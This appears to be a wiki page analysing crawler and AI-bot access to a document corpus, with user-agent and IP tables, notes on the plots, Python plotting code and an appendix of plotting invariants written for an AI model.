Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/100.0.4896.127 Safari/537.36	0	0	0	0	0	2	8	4	0	1	0	0	0	0	0	1	1	0	3	2	1	0
Mozilla/5.0 (compatible; BacklinksExtendedBot)	0	0	0	0	0	4	0	4	0	0	0	0	0	0	0	4	4	0	2	0	1	0
ZoominfoBot (zoominfobot at zoominfo dot com)	0	0	0	0	0	0	0	0	0	0	8	0	0	0	0	5	3	2	0	0	0	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/142.0.0.0 Safari/537.36	16	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36	0	0	0	0	0	3	4	0	4	0	0	0	0	0	2	1	0	1	0	1	0	0
Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm)	0	0	0	0	0	0	0	0	0	0	0	15	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; IbouBot/1.0; +bot@ibou.io; +https://ibou.io/iboubot.html)	13	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; Website-info.net-Robot; https://website-info.net/robot)	0	0	0	0	0	0	0	0	0	0	4	0	0	0	0	0	9	0	0	0	0	0
SEMrushBot	0	0	0	0	0	1	0	2	0	2	0	0	0	0	0	3	0	0	0	2	3	0
DnBCrawler-Analytics	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	6	0	0	6	0	0	0
Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)	0	0	0	0	0	0	0	0	0	2	2	1	0	2	2	3	0	0	0	0	0	0
Mozilla/5.0 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html)	0	0	6	0	0	0	0	0	0	0	2	0	0	0	0	0	0	0	0	3	0	1
Pandalytics/2.0 (https://domainsbot.com/pandalytics/)	0	0	0	0	0	0	0	4	0	0	0	4	0	0	0	0	0	0	0	0	4	0
DomainStatsBot/1.0 (https://domainstats.com/pages/our-bot)	6	0	0	0	0	0	0	0	0	0	0	0	0	4	0	0	0	0	0	0	0	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36	0	0	0	0	0	0	0	0	0	0	8	0	2	0	0	0	0	0	0	0	0	0
2ip bot/1.1 (+https://2ip.io)	0	0	0	0	0	0	6	0	0	0	0	0	0	0	0	0	0	0	0	0	3	0
CCBot/2.0 (https://commoncrawl.org/faq/)	0	0	0	0	0	5	0	0	0	0	0	0	4	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.4 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.4 facebookexternalhit/1.1 Facebot Twitterbot/1.0	0	1	0	1	0	1	1	0	0	0	0	0	0	0	1	0	0	0	0	0	4	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/145.0.7632.116 Safari/537.36	0	0	0	0	0	0	0	0	0	0	0	0	0	1	1	5	0	0	2	0	0	0
Mozilla/5.0 (compatible; BingIndexCrawler/1.0)	0	0	0	0	0	0	0	0	0	0	0	2	0	0	1	0	3	1	1	0	0	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Perplexity-User/1.0; +https://perplexity.ai/perplexity-user)	0	2	3	0	0	2	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; Timpibot/0.8; +http://www.timpi.io)	0	0	0	0	0	0	0	0	0	0	2	0	0	1	0	0	0	0	0	0	4	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/143.0.7499.192 Safari/537.36	0	0	0	0	0	3	0	0	4	0	0	0	0	0	0	0	0	0	0	0	0	0
RecordedFuture Global Inventory Crawler	0	0	0	1	0	0	0	0	0	2	0	0	0	1	0	0	1	0	0	2	0	0
Timpibot/1.0 (+http://timpi.io/crawler)	0	0	0	0	0	0	0	0	0	0	2	0	0	1	0	0	0	0	0	0	4	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ShapBot/0.1.0	0	2	0	0	2	0	0	0	0	0	0	0	0	0	0	0	0	2	0	0	0	0
Mozilla/4.0 (compatible; fluid/0.0; +http://www.leak.info/bot.html)	0	1	0	0	0	1	0	0	0	0	1	0	0	1	0	0	0	0	1	0	0	0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Flyriverbot/1.1 (+https://www.flyriver.com/; AI Content Source Check)	0	0	0	0	0	0	0	0	0	0	0	0	1	0	1	2	0	0	0	1	0	0
Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)	0	0	0	0	0	0	0	0	0	5	0	0	0	0	0	0	0	0	0	0	0	0
OI-Crawler/Nutch (https://openintel.nl/webcrawl/)	0	0	0	0	0	5	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)	0	0	0	0	0	2	2	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; MojeekBot/0.11; +https://www.mojeek.com/bot.html)	2	0	0	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	1	0	0	0
Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	4	0	0	0	0	0	0
Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	1	2	1
ChatGPT/1.2026.006 (Mac OS X 26.2; arm64; build 1768086529)	0	0	0	0	0	0	3	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.006 (iOS 26.2; iPhone18,1; build 20885802981)	0	0	0	0	0	3	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.048 (Mac OS X 26.3; arm64; build 1771630681)	0	0	0	0	0	0	0	0	0	0	3	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.055 (iOS 26.3.1; iPhone14,7; build 22511128209)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	3	0	0	0
GoogleBot/2.1	0	0	0	0	0	0	0	0	0	0	0	0	0	2	0	0	0	0	1	0	0	0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)	0	0	0	0	3	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (bot, like Gecko) Chrome/140.0.7339.210 Safari/537.36	0	0	0	3	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (adaptive-bot)	1	0	0	0	1	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	3	0	0	0	0	0	0	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Nicecrawler/1.1; +http://www.nicecrawler.com/) Chrome/90.0.4430.97 Safari/537.36	0	0	0	2	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0
ChatGPT/1.2025.350 (iOS 26.2; iPhone17,2; build 20387701780)	0	0	0	2	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2025.358 (iOS 26.1; iPhone18,2; build 20738352061)	0	0	0	0	2	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2025.358 (iOS 26.2; iPhone14,7; build 20738352061)	0	0	0	0	2	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.027 (iOS 18.7.2; iPad11,3; build 21538455626)	0	0	0	0	0	0	0	0	2	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.041 (Mac OS X 26.3; arm64; build 1771039076)	0	0	0	0	0	0	0	0	0	2	0	0	0	0	0	0	0	0	0	0	0	0
DuckAssistBot/1.2; (+http://duckduckgo.com/duckassistbot.html)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	1	0	1	0	0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)	0	0	0	2	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; FinepdfsBot/1.0)	0	0	0	0	0	0	0	2	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; SaaSBrowserBot/1.0; +https://saasbrowser.com/bot)	0	0	0	0	0	0	0	0	0	0	0	0	0	2	0	0	0	0	0	0	0	0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/141.0.7390.122 Safari/537.36	0	2	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Scrapy/2.13.4 (+https://scrapy.org)	0	0	0	0	0	2	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)	0	0	0	0	0	0	0	0	0	0	0	1	1	0	0	0	0	0	0	0	0	0
yacybot (/global; amd64 Linux 5.10.0-13-amd64; java 24.0.2; Etc/en) https://yacy.net/bot.html	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	2	0	0
ChatGPT/1.2025.328 (Windows_NT 10.0.26200; x86_64; build ) Electron/37.4.0 Chrome/138.0.7204.243	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2025.350 (Android 15; SM-A356E; build 2535707)	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2025.350 (Android 16; 24129PN74C; build 2535024)	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.013 (iOS 26.2.1; iPhone16,2; build 21084174615)	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.013 (iOS 26.2; iPhone18,1; build 21084174615)	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.027 (Mac OS X 26.2; arm64; build 1769832365)	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.027 (iOS 18.7.3; iPad15,4; build 21538455626)	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.027 (iOS 26.2.1; iPhone15,4; build 21538455626)	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.034 (iOS 18.6.2; iPhone14,5; build 21772720773)	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.041 (Android 14; 100146663; build 2604114)	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.041 (Mac OS X 26.2; arm64; build 1771039076)	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0
ChatGPT/1.2026.055 (Android 13; Nokia G21; build 2605516)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	1	0	0	0
ChatGPT/1.2026.055 (Android 16; SM-M346B; build 2605516)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	1	0	0	0	0
Facebot	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Googlebot/2.1 ( http://www.googlebot.com/bot.html)	0	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	1	0	0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; +http://url-classification.io/wiki/index.php?title=URL_server_crawler) KStandBot/1.0	0	0	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
Scrapy/2.14.1 (+https://scrapy.org)	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0
StormIntelCrawler/1.0 (StormIntel Crawler; http://stormintel.com; info@stormintel.com)	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	0	1
msnbot/0.11 ( http://search.msn.com/msnbot.htm)	0	0	0	0	0	0	0	0	0	0	1	0	0	0	0	0	0	0	0	0	0	0

Top 20 IPs

verification

Table B (verification) - counts for IPs from your 2026-02-03 table (same log corpus; metadata-only)
IP address	country / network	diff	history	version	titles touched	user agent (representative)
216.73.216.213	TBD	2593	52	3909	44	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
66.249.70.70	TBD	3371	279	2611	209	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; GoogleOther)
216.73.216.58	TBD	1431	228	2400	172	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
74.7.227.133	TBD	1502	15	2029	56	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.242.43	TBD	796	16	1163	39	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.71	TBD	1701	189	1036	193	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; GoogleOther)
216.73.216.52	TBD	739	81	1012	107	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
74.7.242.14	TBD	697	10	844	41	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.64	TBD	1025	195	684	188	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; GoogleOther)
74.7.241.52	TBD	571	8	660	46	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.227.134	TBD	431	6	651	30	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.62	TBD	256	57	397	120	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
216.73.216.40	TBD	177	51	299	108	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
74.7.227.23	TBD	151	2	216	21	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.227.33	TBD	46	1	65	9	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)

older

Table A - machine access circa 2026-02-03
IP address	country / network	diff	history	version	titles touched	user agent (representative)
74.7.227.133	USA Verizon	1218	8	1632	14	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.70	USA Google LLC	1170	45	921	30	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X)
74.7.242.43	Canada Rogers Communications	582	11	627	11	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.71	USA Google LLC	565	32	487	30	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X)
216.73.216.52	USA Ohio Anthropic, PBC (AWS AS16509)	554	4	744	6	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.242.14	USA CA ISP	497	6	499	4	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.241.52	USA NY ISP	387	6	393	11	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.64	USA Google LLC	350	23	361	31	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X)
74.7.227.134	USA Microsoft	321	5	433	5	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.213	USA Amazon	203	2	390	3	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.227.23	USA ISP	117	1	157	2	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.58	USA Amazon	106	5	174	3	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.62	USA Amazon	48	0	65	4	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.40	USA Amazon	41	3	65	2	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.227.33	USA ISP	33	1	45	2	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)

2026-02-13 data projections

Lomb-Scargle Periodogram was investigated to see if there is periodicy

www page data access rates - shows the data egress time series

www accumulated data egress

2026-02-13 scatter plot projections

scatter plot including new metadata category (look at the projection mistakes in the File version history)

the model decided to

redact titles to top 50
clip the category labels at 80 chars when I said the category area was too wide (visually)

thus more invariants are required to fix the recalcitrant behaviour

the counts are wrong below, it seems that the model has included metadata access in the human counts

2026-02-13 access lifetime projections

I was trialing metadata access filtering and sent bots away with a 429. The following graphlets show that effect
- Blue = Human page *_get_ok
- Orange = Metadata *_get_ok only
- MA(3) applied (centered, symmetric — removes the triangular daily artefacts)
- Log amplitude = ln(1 + x)
- H_AMP = 20
- Mode A global scale = GLOBAL_MAX_LOG = 6.385
- Lead capped at −10 days

MA(3) log

log amplitudes:
- log transform to amplitudes using log1p(x) = ln(1+x), so zeros remain zero and low counts become visible.
  - Human is amplified before logging: H_log = log1p(H_AMP * HUMAN_MA)
  - Meta is logged directly: M_log = log1p(META_MA)
- Then Mode A scaling uses a single global log scale GLOBAL_MAX_LOG = 5.758
Lead capped at −10 days.
Row spacing retained at 5.20 (no overlap; row_max=2.46).
Heading reports both: GLOBAL_MAX_LOG and H_AMP.
Run parameters (reported):
- Lead_min = -10
- GLOBAL_MAX_LOG = 5.758
- H_AMP = 20
- row_spacing = 5.20
- row_max = 2.46

variable scale

fixed scale

code

import tarfile, re
from datetime import datetime, timezone
from urllib.parse import unquote
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from io import StringIO
from matplotlib.patches import Patch

def open_tar(path):
    return tarfile.open(path, mode="r:*")

# ---------- Load manifest ----------
with open_tar("/mnt/data/corpus.tgz") as tf:
    mpath = next(n for n in tf.getnames() if n.endswith("manifest.tsv"))
    manifest_text = tf.extractfile(mpath).read().decode("utf-8", errors="replace")

manifest = pd.read_csv(StringIO(manifest_text), sep="\t", dtype=str)

def find_col_ci(df, keys):
    low = {c.lower(): c for c in df.columns}
    for k in keys:
        if k.lower() in low:
            return low[k.lower()]
    return None

title_col = find_col_ci(manifest, ["title"]) or manifest.columns[0]
pub_col = find_col_ci(manifest, ["publication-date", "publication_date", "publication date"]) or (
    manifest.columns[2] if len(manifest.columns) >= 3 else None
)
if pub_col is None:
    raise RuntimeError(f"Publication date column not found. Manifest columns: {list(manifest.columns)}")

manifest["pub_dt"] = pd.to_datetime(manifest[pub_col], utc=True, errors="coerce")
manifest_pub = manifest.dropna(subset=["pub_dt"]).copy()

titles = manifest_pub[title_col].tolist()
pub_dt = dict(zip(manifest_pub[title_col], manifest_pub["pub_dt"]))

# ---------- Load rollups ----------
records = []
with open_tar("/mnt/data/rollups.tgz") as tf:
    for name in tf.getnames():
        if not name.endswith(".tsv"):
            continue
        base = name.split("/")[-1]
        prefix = base.split("-to-")[0]
        bstart = datetime.strptime(prefix, "%Y_%m_%dT%H_%MZ").replace(tzinfo=timezone.utc)
        df = pd.read_csv(tf.extractfile(name), sep="\t")
        df["bucket_start"] = bstart
        records.append(df)

rollups = pd.concat(records, ignore_index=True)

colmap = {c.lower(): c for c in rollups.columns}
path_col = colmap["path"]
human_col = colmap["human_get_ok"]
meta_cols = [c for c in rollups.columns if re.match(r".*_get_.*", c, re.I)]

def norm_title(t):
    t = unquote(str(t))
    t = t.replace("_", " ")
    t = re.sub(r"[–—]", "-", t)
    t = re.sub(r"\s+", " ", t).strip()
    return t

def classify(path):
    if not isinstance(path, str):
        return None, None
    p = unquote(path)
    if "/pub-meta/" in p or "-meta/" in p:
        return norm_title(p.split("/")[-1]), "meta"
    if p.startswith("/pub/"):
        return norm_title(p[len("/pub/"):]), "page"
    return None, None

tmp = rollups[path_col].apply(lambda p: pd.Series(classify(p)))
tmp.columns = ["title", "kind"]
rollups = pd.concat([rollups, tmp], axis=1)
rollups = rollups[rollups["title"].isin(titles)].copy()

rollups["day"] = pd.to_datetime(rollups["bucket_start"], utc=True).dt.floor("D")
rollups[human_col] = pd.to_numeric(rollups[human_col], errors="coerce").fillna(0.0)
for c in meta_cols:
    rollups[c] = pd.to_numeric(rollups[c], errors="coerce").fillna(0.0)

# totals for labels
tot_h = rollups[rollups["kind"] == "page"].groupby("title")[human_col].sum()
meta_tmp = rollups[rollups["kind"] == "meta"].copy()
meta_tmp["meta"] = meta_tmp[meta_cols].sum(axis=1)
tot_m = meta_tmp.groupby("title")["meta"].sum()

# daily aggregates
page = (
    rollups[rollups["kind"] == "page"]
    .groupby(["title", "day"], as_index=False)[human_col]
    .sum()
    .rename(columns={human_col: "human"})
)
meta = meta_tmp.groupby(["title", "day"], as_index=False)["meta"].sum()
daily = pd.merge(page, meta, on=["title", "day"], how="outer").fillna(0.0)

global_days = pd.date_range(daily["day"].min(), daily["day"].max(), freq="D", tz="UTC")

# ---------- Build series ----------
MA_N = 7
H_AMP = 10
ROW_MAX = 0.42  # per-title visual excursion in row-units

rows = []
max_by_title = {}

for t in titles:
    pub = pub_dt[t]
    d = (
        daily[daily["title"] == t]
        .set_index("day")[["human", "meta"]]
        .reindex(global_days, fill_value=0.0)
    )
    ma_h = d["human"].rolling(MA_N, min_periods=1).mean().values.astype(float)
    ma_m = d["meta"].rolling(MA_N, min_periods=1).mean().values.astype(float)
    rel = ((d.index - pub.normalize()).days).astype(int)

    disp_h = H_AMP * ma_h
    disp_m = ma_m
    mx = float(np.nanmax(np.maximum(disp_h, disp_m))) if len(disp_h) else 0.0
    max_by_title[t] = mx

    rows.append(pd.DataFrame({"title": t, "rel": rel, "h": disp_h, "m": disp_m}))

series = pd.concat(rows, ignore_index=True)

# ---------- Ordering + Y mapping (mathematical) ----------
# ascending publication datetime; earliest gets highest baseline Y, latest gets Y=0.
ordered = sorted(titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)

def y0_for_index(i):
    return float((N - 1) - i)

ypos = {t: y0_for_index(i) for i, t in enumerate(ordered)}  # latest -> 0, earliest -> N-1

def label(t):
    return f"{t} ({pub_dt[t].isoformat()}) (h:{int(tot_h.get(t,0))}, m:{int(tot_m.get(t,0))})"

# ---------- Plot (NO axis inversion) ----------
fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)))

for t in ordered:
    g = series[series["title"] == t].sort_values("rel")
    x = g["rel"].values.astype(float)
    y0 = ypos[t]
    mx = max_by_title.get(t, 0.0)
    scale = (ROW_MAX / mx) if mx and mx > 0 else 0.0

    # baseline
    ax.plot(x, np.full_like(x, y0), lw=0.25, color="black")
    # Blue UP: y0 -> y0 + h
    ax.fill_between(x, y0, y0 + (g["h"].values * scale), color="tab:blue", alpha=1.0)
    # Orange DOWN: y0 -> y0 - m
    ax.fill_between(x, y0, y0 - (g["m"].values * scale), color="tab:orange", alpha=1.0)

ax.axvline(0, ls="--", lw=0.8, color="black")

# Y ticks in the same numeric coordinate system
yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title("Access Lifecycle Graphlets (Y+ up / Y- down; earliest at highest Y, latest at Y=0)")

ax.legend(
    handles=[
        Patch(facecolor="tab:blue", label="human (MA7×10, up)"),
        Patch(facecolor="tab:orange", label="meta (MA7, down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

# keep margins stable for long labels
plt.subplots_adjust(left=0.40, right=0.98, top=0.95, bottom=0.06)

out = "/mnt/data/lifecycle_graphlets_MATH_Y.png"
plt.savefig(out, dpi=180)
plt.close()
print(out)

2026-02-05 access lifetime

Apologies for the model making mistakes with these projections - it had extreme trouble with the invariants it can take hours and many turns to get the projection right. This one has human and metadata access inverted.

2026-02-03 access lifetime

2026-02-03 accumulated page counts

The page category bar graph has been revised to project page access, metadata access, ai and bot access which provides interesting insight. There are bots masquerading as regular browsers and accessing the metadata pages and walking through the mediawiki page versions.

After today's analysis I can see I need to reproject the others now that I have separated semantic access between page and metadata. The metadata access has been proven to be mostly machine driven and pages of interest have higher machine hits. Machines have been tasked to watch this corpus and the proof is in the above projections.

2026-02-02 accumulated human get

This morning the model has been quite unreliable as you will see if you look at how the versions of the following projections progress. I doesn't matter how good the normative sections are, it still needs a lot of prompting to get things right. it got the order wrong in the scatter plot, and there is a page with 0 counts because it can't handle the titles properly and can't do a simple match between tsv files title names back to manifest verbatim names. It also did not style the accumulated projection colour so the line graph is ambiguous.

It turns out that there is a high percentage of metadata access that comes from machinery that is not identifying as a robot. The new rollups from 2036-02-03 now split that category out.

2026-02-02 from 2025-12-15: page bar chart

2026-02-02 from 2025-12-15: page access scatter plot

2026-02-02 from 2025-12-15: cumulative human_get line plot

2026-02-01 accumulated human get

2026-02-01 from 2025-12-15: total counts human_get

2026-02-01 from 2025-12-15: page access scatter plot

2026-02-01 from 2025-12-15: cumulative human_get line plot

2026-01-30 older projectionw

These were produced with slightly different invariants and proved problematic - so invariants were updated.

2026-01-30 from 2025-12-25: accumulated human_get

2026-01-30 from 2025-12-25: page access scatter plot

Appendix A - Corpus Projection Invariants (Normative)

GP-0 Projection Direction Up and Down semantics (MANDATORY, NORMATIVE)

Graphs projections are into mathematical spaces (e.g. paper, Cartesian coordinate systems):

the top of a 2D graph is in the increasing positive Y direction
- to go up means to increase Y value; upwards is increasing Y
the bottom of a 2D graph is the decreasing Y direction
- to go down means to decrease Y value; downwards is decreasing Y
the left of a 2D graph is in the decreasing X direction
- to go left means to decrease X value; leftwards is decreasing X
the right of a 2D graph is in the increasing X direction
- to go right means to increase X value; rightwards is increasing X

The human will think and relate via these conventions, do not mix these semantics with whatever you do to make the tooling project.

E.g.

human bell curves must be blue and point upwards i.e. the peaks have projected Y values above the baseline.
metadata bell curves must be orange and point downwards i.e. the peaks have projected Y value below the baseline.

GP-0a: Projection Direction Tooling Override Prohibition (MANDATORY, NORMATIVE)

The assisting system, plotting library, or UI layer MUST NOT override, reinterpret, or “helpfully adjust” any of the following governed properties:

Axis direction (NO y-axis inversion; NO automatic axis flipping)
Row ordering (publication datetime ascending only)
